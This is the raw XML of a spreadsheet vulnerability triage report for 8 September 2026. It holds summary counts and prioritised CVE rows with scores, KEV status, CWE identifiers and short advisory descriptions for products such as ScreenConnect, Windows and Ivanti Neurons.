Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84303" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84376" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84445" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85062" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85063" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2x7j-588g-ccc2" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16045" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16042" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-8m3c-c648-2xjj" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16047" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16046" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-cc9r-2j5m-2m83" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16043" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-wmmp-3585-3rmp" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16048" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16049" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16050" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16051" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16052" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16056" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16057" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16058" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16199" TargetMode="External" Id="rId108"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2026-09-08</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-08T00:00 to 2026-09-09T00:00</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-17 11:31:53 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>1693</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  New - published today</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>1678</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Significant updates</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Added to CISA KEV</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>18</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>102</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>979</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>496</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>43</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Unscored</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>131</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>442</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B18" s="3" t="n">
        <v>108</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worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetPr><outlinePr summaryBelow="1" summaryRight="1" /><pageSetUpPr /></sheetPr><dimension ref="A1:T1694" /><sheetViews><sheetView workbookViewId="0"><pane xSplit="3" ySplit="1" topLeftCell="D2" activePane="bottomRight" state="frozen" /><selection pane="topRight" /><selection pane="bottomLeft" /><selection pane="bottomRight" activeCell="A1" sqref="A1" /></sheetView></sheetViews><sheetFormatPr baseColWidth="8" defaultRowHeight="15" /><cols><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sheetData><row r="1"><c r="A1" s="4" t="inlineStr"><is><t>Priority</t></is></c><c r="B1" s="4" t="inlineStr"><is><t>Reason</t></is></c><c r="C1" s="4" t="inlineStr"><is><t>ID</t></is></c><c r="D1" s="4" t="inlineStr"><is><t>CVSS</t></is></c><c r="E1" s="4" t="inlineStr"><is><t>Severity</t></is></c><c r="F1" s="4" t="inlineStr"><is><t>Score src</t></is></c><c r="G1" s="4" t="inlineStr"><is><t>KEV</t></is></c><c r="H1" s="4" t="inlineStr"><is><t>EPSS</t></is></c><c r="I1" s="4" t="inlineStr"><is><t>SSVC</t></is></c><c r="J1" s="4" t="inlineStr"><is><t>Watchlist</t></is></c><c r="K1" s="4" t="inlineStr"><is><t>Vendor / Product</t></is></c><c r="L1" s="4" t="inlineStr"><is><t>Package</t></is></c><c r="M1" s="4" t="inlineStr"><is><t>Fixed in</t></is></c><c r="N1" s="4" t="inlineStr"><is><t>Sources</t></is></c><c r="O1" s="4" t="inlineStr"><is><t>Published</t></is></c><c r="P1" s="4" t="inlineStr"><is><t>Last Modified</t></is></c><c r="Q1" s="4" t="inlineStr"><is><t>KEV Due</t></is></c><c r="R1" s="4" t="inlineStr"><is><t>CWE</t></is></c><c r="S1" s="4" t="inlineStr"><is><t>Description</t></is></c><c r="T1" s="4" t="inlineStr"><is><t>Link</t></is></c></row><row r="2"><c r="A2" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B2" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2" s="5" t="inlineStr"><is><t>CVE-2026-84869</t></is></c><c r="D2" s="5" t="n"><v>9.9</v></c><c r="E2" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2" s="5" t="inlineStr"><is><t>7d616e1a-3288-43b1-a0dd-0a65d3e70a49</t></is></c><c r="G2" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H2" s="5" t="n"><v>0.007</v></c><c r="I2" s="5" t="inlineStr" /><c r="J2" s="5" t="inlineStr" /><c r="K2" s="5" t="inlineStr"><is><t>connectwise:screenconnect</t></is></c><c r="L2" s="5" t="inlineStr" /><c r="M2" s="5" t="inlineStr" /><c r="N2" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O2" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q2" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="R2" s="5" t="inlineStr"><is><t>CWE-269, CWE-862</t></is></c><c r="S2" s="5" t="inlineStr"><is><t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t></is></c><c r="T2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t></is></c></row><row r="3"><c r="A3" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B3" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C3" s="5" t="inlineStr"><is><t>CVE-2026-81963</t></is></c><c r="D3" s="5" t="n"><v>7.8</v></c><c r="E3" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F3" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G3" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H3" s="5" t="n"><v>0.006</v></c><c r="I3" s="5" t="inlineStr" /><c r="J3" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L3" s="5" t="inlineStr" /><c r="M3" s="5" t="inlineStr" /><c r="N3" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O3" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P3" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q3" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="R3" s="5" t="inlineStr"><is><t>CWE-284, CWE-59</t></is></c><c r="S3" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t></is></c></row><row r="4"><c r="A4" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B4" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C4" s="5" t="inlineStr"><is><t>CVE-2026-85880</t></is></c><c r="D4" s="5" t="n"><v>7.8</v></c><c r="E4" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F4" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G4" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H4" s="5" t="n"><v>0.006</v></c><c r="I4" s="5" t="inlineStr" /><c r="J4" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t></is></c><c r="L4" s="5" t="inlineStr" /><c r="M4" s="5" t="inlineStr" /><c r="N4" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O4" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P4" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q4" s="5" t="inlineStr"><is><t>2026-09-22</t></is></c><c r="R4" s="5" t="inlineStr"><is><t>CWE-122, CWE-908</t></is></c><c r="S4" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t></is></c></row><row r="5"><c r="A5" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B5" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C5" s="5" t="inlineStr"><is><t>CVE-2026-60004</t></is></c><c r="D5" s="5" t="inlineStr" /><c r="E5" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G5" s="5" t="inlineStr" /><c r="H5" s="5" t="n"><v>0.868</v></c><c r="I5" s="5" t="inlineStr" /><c r="J5" s="5" t="inlineStr" /><c r="K5" s="5" t="inlineStr" /><c r="L5" s="5" t="inlineStr"><is><t>Go:gitea.dev</t></is></c><c r="M5" s="5" t="inlineStr"><is><t>1.27.1</t></is></c><c r="N5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O5" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P5" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q5" s="5" t="inlineStr" /><c r="R5" s="5" t="inlineStr" /><c r="S5" s="5" t="inlineStr"><is><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is></c><c r="T5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t></is></c></row><row r="6"><c r="A6" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B6" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C6" s="5" t="inlineStr"><is><t>CVE-2026-44756</t></is></c><c r="D6" s="5" t="n"><v>10</v></c><c r="E6" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F6" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G6" s="5" t="inlineStr" /><c r="H6" s="5" t="n"><v>0.003</v></c><c r="I6" s="5" t="inlineStr" /><c r="J6" s="5" t="inlineStr" /><c r="K6" s="5" t="inlineStr" /><c r="L6" s="5" t="inlineStr" /><c r="M6" s="5" t="inlineStr" /><c r="N6" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q6" s="5" t="inlineStr" /><c r="R6" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S6" s="5" t="inlineStr"><is><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is></c><c r="T6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t></is></c></row><row r="7"><c r="A7" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B7" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C7" s="5" t="inlineStr"><is><t>CVE-2026-82004</t></is></c><c r="D7" s="5" t="n"><v>10</v></c><c r="E7" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F7" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G7" s="5" t="inlineStr" /><c r="H7" s="5" t="n"><v>0.014</v></c><c r="I7" s="5" t="inlineStr" /><c r="J7" s="5" t="inlineStr" /><c r="K7" s="5" t="inlineStr"><is><t>adobe:campaign</t></is></c><c r="L7" s="5" t="inlineStr" /><c r="M7" s="5" t="inlineStr" /><c r="N7" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O7" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P7" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q7" s="5" t="inlineStr" /><c r="R7" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S7" s="5" t="inlineStr"><is><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is></c><c r="T7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t></is></c></row><row r="8"><c r="A8" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B8" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C8" s="5" t="inlineStr"><is><t>CVE-2026-12645</t></is></c><c r="D8" s="5" t="n"><v>9.9</v></c><c r="E8" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F8" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G8" s="5" t="inlineStr" /><c r="H8" s="5" t="n"><v>0.012</v></c><c r="I8" s="5" t="inlineStr" /><c r="J8" s="5" t="inlineStr" /><c r="K8" s="5" t="inlineStr" /><c r="L8" s="5" t="inlineStr" /><c r="M8" s="5" t="inlineStr" /><c r="N8" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O8" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P8" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q8" s="5" t="inlineStr" /><c r="R8" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S8" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t></is></c></row><row r="9"><c r="A9" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B9" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C9" s="5" t="inlineStr"><is><t>CVE-2026-12646</t></is></c><c r="D9" s="5" t="n"><v>9.9</v></c><c r="E9" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F9" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G9" s="5" t="inlineStr" /><c r="H9" s="5" t="n"><v>0.012</v></c><c r="I9" s="5" t="inlineStr" /><c r="J9" s="5" t="inlineStr" /><c r="K9" s="5" t="inlineStr" /><c r="L9" s="5" t="inlineStr" /><c r="M9" s="5" t="inlineStr" /><c r="N9" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O9" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P9" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q9" s="5" t="inlineStr" /><c r="R9" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S9" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t></is></c></row><row r="10"><c r="A10" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B10" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C10" s="5" t="inlineStr"><is><t>CVE-2026-12647</t></is></c><c r="D10" s="5" t="n"><v>9.9</v></c><c r="E10" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F10" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G10" s="5" t="inlineStr" /><c r="H10" s="5" t="n"><v>0.012</v></c><c r="I10" s="5" t="inlineStr" /><c r="J10" s="5" t="inlineStr" /><c r="K10" s="5" t="inlineStr" /><c r="L10" s="5" t="inlineStr" /><c r="M10" s="5" t="inlineStr" /><c r="N10" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O10" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P10" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q10" s="5" t="inlineStr" /><c r="R10" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S10" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T10" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t></is></c></row><row r="11"><c r="A11" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B11" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C11" s="5" t="inlineStr"><is><t>CVE-2026-12650</t></is></c><c r="D11" s="5" t="n"><v>9.9</v></c><c r="E11" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F11" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G11" s="5" t="inlineStr" /><c r="H11" s="5" t="n"><v>0.015</v></c><c r="I11" s="5" t="inlineStr" /><c r="J11" s="5" t="inlineStr" /><c r="K11" s="5" t="inlineStr" /><c r="L11" s="5" t="inlineStr" /><c r="M11" s="5" t="inlineStr" /><c r="N11" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O11" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P11" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q11" s="5" t="inlineStr" /><c r="R11" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S11" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T11" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t></is></c></row><row r="12"><c r="A12" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B12" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C12" s="5" t="inlineStr"><is><t>CVE-2026-19232</t></is></c><c r="D12" s="5" t="n"><v>9.9</v></c><c r="E12" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F12" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G12" s="5" t="inlineStr" /><c r="H12" s="5" t="n"><v>0.006</v></c><c r="I12" s="5" t="inlineStr" /><c r="J12" s="5" t="inlineStr" /><c r="K12" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L12" s="5" t="inlineStr" /><c r="M12" s="5" t="inlineStr" /><c r="N12" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O12" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P12" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q12" s="5" t="inlineStr" /><c r="R12" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S12" s="5" t="inlineStr"><is><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is></c><c r="T12" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t></is></c></row><row r="13"><c r="A13" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B13" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C13" s="5" t="inlineStr"><is><t>CVE-2026-26084</t></is></c><c r="D13" s="5" t="n"><v>9.9</v></c><c r="E13" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F13" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G13" s="5" t="inlineStr" /><c r="H13" s="5" t="n"><v>0.002</v></c><c r="I13" s="5" t="inlineStr" /><c r="J13" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K13" s="5" t="inlineStr" /><c r="L13" s="5" t="inlineStr" /><c r="M13" s="5" t="inlineStr" /><c r="N13" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q13" s="5" t="inlineStr" 